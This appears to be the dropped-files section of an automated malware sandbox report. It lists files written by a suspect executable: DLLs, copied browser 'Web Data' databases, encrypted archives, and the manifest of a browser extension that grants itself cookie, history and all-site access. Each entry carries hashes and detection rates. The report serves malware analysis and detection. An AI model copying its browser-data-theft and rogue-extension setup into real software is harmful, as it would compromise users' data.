                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73160
                                                                                                                                                                        Entropy (8bit):6.49500452335621
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
                                                                                                                                                                        MD5:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                        SHA1:27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
                                                                                                                                                                        SHA-256:298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
                                                                                                                                                                        SHA-512:65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\atl71.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):89600
                                                                                                                                                                        Entropy (8bit):6.46929682960805
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
                                                                                                                                                                        MD5:79CB6457C81ADA9EB7F2087CE799AAA7
                                                                                                                                                                        SHA1:322DDDE439D9254182F5945BE8D97E9D897561AE
                                                                                                                                                                        SHA-256:A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
                                                                                                                                                                        SHA-512:ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Er................................0....................................................Rich...........................PE..L...PK.D...........!................r..............|................................................................p...........<....@..0#...................p..H...0...................................@...............0............................text...4........................... ..`.rdata..M7.......8..................@..@.data........ ......................@....rsrc...0#...@...$...$..............@..@.reloc.......p.......H..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):92080
                                                                                                                                                                        Entropy (8bit):5.923150781730819
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:5myH1Ar4zLdIoXJED0ySFzyhSU+kcexDCaDRqxAnNQDB:foEZEDDSFzDkce7RqxAnIB
                                                                                                                                                                        MD5:DBA9A19752B52943A0850A7E19AC600A
                                                                                                                                                                        SHA1:3485AC30CD7340ECCB0457BCA37CF4A6DFDA583D
                                                                                                                                                                        SHA-256:69A5E2A51094DC8F30788D63243B12A0EB2759A3F3C3A159B85FD422FC00AC26
                                                                                                                                                                        SHA-512:A42C1EC5594C6F6CAE10524CDAD1F9DA2BDC407F46E685E56107DE781B9BCE8210A8CD1A53EDACD61365D37A1C7CEBA3B0891343CF2C31D258681E3BF85049D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y.|...|...|...t...|...p...|...p...|...p...|...p...|..~t...|..._...|...t...|..~t...|...|..6|..sk...|..sk...|...w...|..sk...|..Rich.|..........PE..L...&..M...........!.............................y".........................P....................................................... ..`............P.......0..X...................................h...@............................................text............................... ..`.rdata...F.......P..................@..@.data...............................@....rsrc...`.... ....... ..............@..@.reloc.......0... ...0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\download_engine.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):3512776
                                                                                                                                                                        Entropy (8bit):6.514740710935125
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:49152:O/4yyAd2+awsEL4eyiiDoHHPLvQB0o32Qm6m7VBmurXztN:OVrsEcTiiAvLa0oYkuf/
                                                                                                                                                                        MD5:1A87FF238DF9EA26E76B56F34E18402C
                                                                                                                                                                        SHA1:2DF48C31F3B3ADB118F6472B5A2DC3081B302D7C
                                                                                                                                                                        SHA-256:ABAEB5121548256577DDD8B0FC30C9FF3790649AD6A0704E4E30D62E70A72964
                                                                                                                                                                        SHA-512:B2E63ABA8C081D3D38BD9633A1313F97B586B69AE0301D3B32B889690327A575B55097F19CC87C6E6ED345F1B4439D28F981FDB094E6A095018A10921DAE80D9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......M..}..{...{...{.......{...$...{...t...{...&...{.......{...$...{...b...{...&...{...$...{...q.B.{...&...{...&...{...z...{.....k.{...'...{...%...{...!...{.Rich..{.........................PE..L......S...........!.....P'.........=\.......`'...............................6.....&.5.............................0./......./.h.....1.`.............5.......1..d..pg'..............................................`'.p............................text....I'......P'................. ..`.rdata..Kt...`'......`'.............@..@.data...L...../..@..../.............@....rsrc...`.....1...... 1.............@..@.reloc...L....1..P...01.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):503808
                                                                                                                                                                        Entropy (8bit):6.4043708480235715
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:b692dAsfQqt4oJcRYRhUgiW6QR7t5k3Ooc8iHkC2ek:bSYACJcRYe3Ooc8iHkC2e
                                                                                                                                                                        MD5:A94DC60A90EFD7A35C36D971E3EE7470
                                                                                                                                                                        SHA1:F936F612BC779E4BA067F77514B68C329180A380
                                                                                                                                                                        SHA-256:6C483CBE349863C7DCF6F8CB7334E7D28C299E7D5AA063297EA2F62352F6BDD9
                                                                                                                                                                        SHA-512:FF6C41D56337CAC074582002D60CBC57263A31480C67EE8999BC02FC473B331EEFED93EE938718D297877CF48471C7512741B4AEBC0636AFC78991CDF6EDDFAB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k..............C..............N......N.......N......N......N......N......N......Rich............PE..L....Q.D...........!.................-............<|................................&[..................................?....2..<....p...........................0......8...........................(-..H............................................text............................... ..`.rdata...+.......0..................@..@.data...h!...@... ...@..............@....rsrc........p.......`..............@..@.reloc...0.......@...p..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):348160
                                                                                                                                                                        Entropy (8bit):6.56488891304105
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:cPlV59g81QWguohIP/siMbo8Crn2zzwRFMciFMNrb3YgxS3bCAO5kkG:OlVvN1QWguohInJDrn8zwNF7eCr
                                                                                                                                                                        MD5:CA2F560921B7B8BE1CF555A5A18D54C3
                                                                                                                                                                        SHA1:432DBCF54B6F1142058B413A9D52668A2BDE011D
                                                                                                                                                                        SHA-256:C4D4339DF314A27FF75A38967B7569D9962337B8D4CD4B0DB3ABA5FF72B2BFBB
                                                                                                                                                                        SHA-512:23E0BDD9458A5A8E0F9BBCB7F6CE4F87FCC9E47C1EE15F964C17FF9FE8D0F82DD3A0F90263DAAF1EE87FAD4A238AA0EE92A16B3E2C67F47C84D575768EDBA43E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v.............K.E.........S...F.x.....F......F.G.....F.D.....F.F.....F.B.....Rich............................PE..L....Q.D...........!..............................6|.........................`......V...............................L....C......(.... .......................0..h+......8...............................H...............l............................text............................... ..`.rdata..`...........................@..@.data....h.......`..................@....rsrc........ ......................@..@.reloc..h+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\download\zlib1.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):59904
                                                                                                                                                                        Entropy (8bit):6.753320551944624
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:ZfU1BgfZqvECHUhUMPZVmnToIfxIOjIOG8TI:ZfzfZR2UhUMPZVSTBfbFG6I
                                                                                                                                                                        MD5:89F6488524EAA3E5A66C5F34F3B92405
                                                                                                                                                                        SHA1:330F9F6DA03AE96DFA77DD92AAE9A294EAD9C7F7
                                                                                                                                                                        SHA-256:BD29D2B1F930E4B660ADF71606D1B9634188B7160A704A8D140CADAFB46E1E56
                                                                                                                                                                        SHA-512:CFE72872C89C055D59D4DE07A3A14CD84A7E0A12F166E018748B9674045B694793B6A08863E791BE4F9095A34471FD6ABE76828DC8C653BE8C66923A5802B31E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."u.-f..~f..~f..~c..~e..~c..~g..~c..~c..~c..~d..~...~d..~f..~~..~...~k..~...~d..~...~g..~...~g..~...~g..~Richf..~........................PE..L...%..M...........!.........R....................[!.........................0.........................................].......<............................ ..........................................................h............................text............................... ..`.rdata...F.......H..................@..@.data...t...........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ecvB803.tmp
                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb2e8beb6, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):26738688
                                                                                                                                                                        Entropy (8bit):1.0164576350128136
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:wEwqTaoxujmVezmgxeCAGiSoB0yLKgSFDb7uBi:GmVezxerk
                                                                                                                                                                        MD5:4D015B11306E72A07B0F37934ABF3A16
                                                                                                                                                                        SHA1:288A561B9346A93F4BF13ABEA91A5B4097D27504
                                                                                                                                                                        SHA-256:DB4D8315572F112B0A7AA20F26A779A10613D81C11C6646810F369AFBBC17C44
                                                                                                                                                                        SHA-512:E406B63B2E3FDC4BB666EF3E26F092E16D54DD155142E1524828DCFD13251CB312B785AFD97172A75227A6377057E6348889A443AA4D7706C0EAE60436201FD3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: ..... .......50.......te3....wg.......................)..........x/.*....x..h.+.........................6..43....wI.............................................................................................Z............B.................................................................................................................. .......3....y......................................................................................................................................................................................................................................uPP%3....y.c................qn.1....x..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\gdiview.msi
                                                                                                                                                                        Process:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        File Type:;1033
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):237056
                                                                                                                                                                        Entropy (8bit):6.262405449836627
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                                        MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                                        SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                                        SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                                        SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1397922
                                                                                                                                                                        Entropy (8bit):7.999863097294012
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                                        MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                                        SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                                        SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                                        SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):293320
                                                                                                                                                                        Entropy (8bit):6.347427939821131
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                                        MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                                        SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                                        SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                                        SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Web Data1612045902911
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:7-zip archive data, version 0.3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):36105
                                                                                                                                                                        Entropy (8bit):7.994610469125073
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                                        MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                                        SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                                        SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                                        SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                                        C:\Users\user\AppData\Local\crx.json
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1981
                                                                                                                                                                        Entropy (8bit):5.365969892012237
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                                        MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                                        SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                                        SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                                        SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                                        C:\Users\user\AppData\Localwebdata1612045902958
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):1.1874185457069584
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                        MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):103632
                                                                                                                                                                        Entropy (8bit):6.404475911013687
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                                        MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                        SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                                        SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                                        SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Roaming\1612045890161.txt
                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):27328
                                                                                                                                                                        Entropy (8bit):3.7078509698470126
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:b3w/3wBkf3DpvI6PprepmlmE1lVT0oMoSDNlkSP:bqg+flvIKpt3VvODNlkSP
                                                                                                                                                                        MD5:C82FB62C10E490945B2CB638D72998D2
                                                                                                                                                                        SHA1:1F746A26B442E8D69457445D78F0E2F52BAE9D66
                                                                                                                                                                        SHA-256:6CC5B1B6DB576F487EC2B21D258BEDFAA1E233DBA53A663C1019AF8ECC7F8D53
                                                                                                                                                                        SHA-512:A13B2F8C7796AE7276B52993ECC1627B58082321699D5C5C72D7BFC042F6B24283A26F227DFF0B8249769C5B2E96137A10391752BD28EE21672F44ADAB5429D3
                                                                                                                                                                        Malicious:false
